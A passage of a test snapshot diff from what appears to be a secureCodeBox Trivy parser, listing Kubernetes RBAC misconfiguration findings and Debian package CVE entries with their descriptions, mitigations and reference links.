"fixedVersion": "1:1.2.11.dfsg-2+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-37434", - "installedVersion": "1:1.2.11.dfsg-2", - "packageName": "zlib1g", + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - "https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - "https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV045", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv045", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits wildcard verb on specific resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", + "mitigation": "Create a role which does not permit wildcard verb on specific resources", + "name": "No wildcard verb roles(Role permits wildcard verb on specific resources)", + "references": [ { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://avd.aquasec.com/misconfig/ksv045", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'local-path-provisioner-role' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", + ], + }, + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", + ], + }, + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "1.8.2.2", + "packageName": "apt", + "references": [ + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", + ], + }, + "category": "Vulnerability", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-37600", + "installedVersion": "1:2.33.1-0.1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-37600", + "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", + "https://github.com/karelzak/util-linux/issues/1395", + "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", + "https://security.netapp.com/advisory/ntap-20210902-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-37600", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "util-linux: integer overflow can lead to buffer overflow in get_sem_elements() in sys-utils/ipcutils.c", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://avd.aquasec.com/nvd/cve-2021-37600", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://access.redhat.com/security/cve/CVE-2021-37600", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://github.com/karelzak/util-linux/issues/1395", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", }, { - "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1:1.2.11.dfsg-2+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-25032", - "installedVersion": "1:1.2.11.dfsg-2", - "packageName": "zlib1g", - "references": [ - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210902-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-37600", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.33.1-0.1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": 